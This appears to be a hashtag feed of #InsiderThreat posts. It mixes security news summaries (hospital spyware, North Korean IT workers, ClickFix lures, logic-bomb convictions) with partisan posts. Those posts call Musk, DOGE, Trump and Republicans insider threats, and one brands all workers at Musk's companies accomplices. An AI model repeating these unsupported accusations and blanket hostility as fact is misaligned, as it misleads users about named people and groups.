And here's another reminder of the insider threat if you don't investigate your employees' or consultants' backgrounds and claimed credentials carefully enough. @briankrebs has the story and how a number of criminal cases may now be appealed or overturned:
Cyber Forensic Expert in 2,000+ Cases Faces FBI Probe:
https://krebsonsecurity.com/2025/04/cyber-forensic-expert-in-2000-cases-faces-fbi-probe/
Today's reminder of the insider threat involves a pharmacist in Maryland who over a period of 8 years or more, used keyloggers and installed spyware on about 400 computers at the University of Maryland Medical System so he could spy on female co-workers in private moments at work (such as changing clothes, breastfeeding their babies), and in their homes. He was reportedly fired in October 2024, and was able to get another job in another healthcare facility in Maryland because there has been no criminal charges filed against him yet and UMMS apparently didn't alert his new employer.
If Maryland law is like my state's laws, the hospital may be barred legally from revealing what happened if asked for a recommendation by the new employer. And it seems the Maryland state pharmacy board can't just suspend a license unless there's been a conviction, so the failure to have criminal charges filed already seems to have put more potential victims at risk.
Unsurprisingly, a potential class action lawsuit has already been filed against UMMS with six plaintiffs so far. There are estimates that there are more than 80 victims of the now-former employee.
Some of the media coverage on the case: https://thedailyrecord.com/2025/04/04/six-women-sue-umms-claiming-staffer-spied-on-them-after-security-breach/
North Korean IT workers set their sights on European organizations https://www.helpnetsecurity.com/2025/04/02/north-korean-it-workers-target-europe/ #webapplication #webdevelopment #insiderthreat #blockchain #NorthKorea #Don'tmiss #datatheft #extortion #Hotstuff #News #CMS #EU #UK
The North Koreans and Russians have been busy, Insiders abound, and attacker tradecraft continues to evolve!
Catch all this and more in our latest wrap-up of the day's news:
https://opalsec.io/daily-news-update-monday-april-1-2025-australia-melbourne/
There are a few noteworthy stories to get across - here's the TL;DR to get you up to speed:
North Korean Infiltration: This is way bigger than many think. DPRK nationals are landing jobs inside global companies, gaining privileged access ("keys to the kingdom" level!). DTEX reports active investigations in 7% of their Fortune Global 2000 clients, and CrowdStrike notes nearly 40% of their NK-related IR cases involved insiders. They move fast post-hire, pivoting to supply chains and installing RATs disguised as onboarding. Watch out for highly anomalous login behaviour (like days-long sessions!). Rigorous remote hiring checks (camera on, resume checks, comms style) are crucial.
ClickFix Tactics by Lazarus: The infamous North Korean group is evolving its 'Contagious Interview' campaign (now dubbed 'ClickFake' by Sekoia). They're targeting crypto job seekers (shifting focus to non-tech roles too!) with fake website/document errors ('ClickFix'). These prompt users to run PowerShell/curl commands, dropping the 'GolangGhost' backdoor. Watch out for lures impersonating giants like Coinbase or Kraken. Sekoia has shared YARA rules – definitely worth checking out.
WordPress MU-Plugin Abuse: Bad actors are getting stealthy by hiding malicious code in WordPress "Must-Use Plugins" (wp-content/mu-plugins/). These execute automatically on every page load without activation, making them hard to spot. Sucuri is seeing redirects to fake browser updates, webshell backdoors fetching code from GitHub, and JS hijackers replacing content or links. Keep those instances patched, clean up unused plugins/themes, and lock down admin accounts (MFA!).
Check out what else happened in the past 24 hours, and subscribe to get each edition straight to your inbox:
https://opalsec.io/daily-news-update-monday-april-1-2025-australia-melbourne/#/portal/signup
Man found guilty of planting infinite loop logic bomb on ex-employer’s system – Source: www.bitdefender.com https://ciso2ciso.com/man-found-guilty-of-planting-infinite-loop-logic-bomb-on-ex-employers-system-source-www-bitdefender-com/ #rssfeedpostgeneratorecho #CyberSecurityNews #grahamcluleycom #insiderthreat #Grahamcluley #Guestblog #Lawℴ #logicbomb #Malware
Man found guilty of planting infinite loop logic bomb on ex-employer’s system https://www.bitdefender.com/en-us/blog/hotforsecurity/man-found-guilty-of-planting-infinite-loop-logic-bomb-on-ex-employers-system #insiderthreat #Guestblog #Lawℴ #logicbomb #Malware
Man found guilty of planting infinite loop logic bomb on ex-employer’s system - Davis Lu had planted malicious Java code onto his employer's network that would cause "in... https://www.bitdefender.com/en-us/blog/hotforsecurity/man-found-guilty-of-planting-infinite-loop-logic-bomb-on-ex-employers-system #insiderthreat #guestblog #lawℴ #logicbomb #malware
Developer guilty of using kill switch to sabotage employer's systems
Software developer convicted for sabotaging employer systems post-demotion. #Cybersecurity #InsiderThreat #DataSecurity
More details: https://www.bleepingcomputer.com/news/security/developer-guilty-of-using-kill-switch-to-sabotage-employers-systems/ - https://www.flagthis.com/news/10997
Developer Convicted for Hacking Former Employer’s Systems – Source: www.securityweek.com https://ciso2ciso.com/developer-convicted-for-hacking-former-employers-systems-source-www-securityweek-com/ #rssfeedpostgeneratorecho #CyberSecurityNews #securityweekcom #insiderthreat #securityweek #Cybercrime #insider
Developer Convicted for Hacking Former Employer’s Systems https://www.securityweek.com/developer-convicted-for-hacking-former-employers-systems/ #InsiderThreat #Cybercrime #insider
Developer Convicted for Hacking Former Employer’s Systems https://www.securityweek.com/developer-convicted-for-hacking-former-employers-systems/ #InsiderThreat #Cybercrime #insider
Two Good Reads.
https://talkingpointsmemo.com/edblog/two-good-reads
"Musk’s anger at federal regulators powered his dedication to the wilding spree...
the plain facts of what both pieces describe make clear that the best conceptual model for #DOGE is something between an #InsiderThreat action and a #terrorist operation. The emphasis on secrecy, misdirection and illegality is all there, the focus on seizing control of central nodes of #power & destroying things"
@hanse_mina The US has an enormous #InsiderThreat : it is Mango Mussolini, his hench(men/women), cowed/kompramatted #Republicans in #Congress and their US billionaire and #Kremlin handlers. It's a full-on national security threat.
@Meyerweb The US has an enormous #InsiderThreat : it is Mango Mussolini, his hench(men/women), cowed/kompramatted #Republicans in #Congress and their US billionaire and #Kremlin handlers. Full-on national security threat.
"Allies of Musk also began arriving at tech hubs in the federal government before Inauguration Day — the first hint of the scope of his incursion."
#GiftLink
https://www.nytimes.com/2025/02/28/us/politics/musk-federal-bureaucracy-takeover.html?unlocked_article_code=1.0U4.t9r3.sBTAws_GSyV3&smid=url-share
I recommend reading the whole article. You can do so even without a subscription by using the above link.
Robert Evans: Democratic Insiders Are Sharing A Warning About Curtis Yarvin, Elon Musk & Neoreactionaries. DNC employees and think tank workers are spreading a document about the Neoreactionary threat to democracy.
#coup #technofascism #InsiderThreat #authoritarianism #neoreactionary
https://shatterzone.substack.com/p/democratic-insiders-are-sharing-a
This petty suggestion is probably an indication that at least one Five Eyes partner has exhibited a rational response to Trump's election and stopped sharing sensitive intelligence. As they all should have last November. It's not like they don't know what a security threat Trump and his goons represent. I'm sure they're only sharing limited intelligence without risk of damage when it's funneled directly to Putin. I mean, of course they are. #intelligence #InsiderThreat #coup #natsec https://www.ft.com/content/2dfa3c11-64a7-49f6-83df-939b8d1cfb8e
Here Are the Digital Clues to What Musk Is Really Up To
#GiftLink
https://www.nytimes.com/2025/02/21/opinion/musk-doge-personal-data.html?unlocked_article_code=1.y04.9Xpj.G6bhZK21cNZh
#Musk is "exploiting vulnerabilities that are built into the nation’s technological systems, operating as what #cybersecurity experts call an #InsiderThreat...
Modern #digital systems supercharge that #threat by consolidating more & more #information from many distinct realms.
...reams of classified #data on a thumb drive."
#elonmusk has made it clear that he's an active, fast moving threat -- to the United States, to #democracy, to #truth and to #justice across the globe.
His supporters and employees are likewise a threat. Every worker at #SpaceX or #Tesla or any of his companies not looking to leave is an accomplice or actively sabotaging the fascist are threats as well. They should all be treated as an #insiderthreat . Maybe they can be reasoned with, but their continued support of Musk cannot be tolerated.
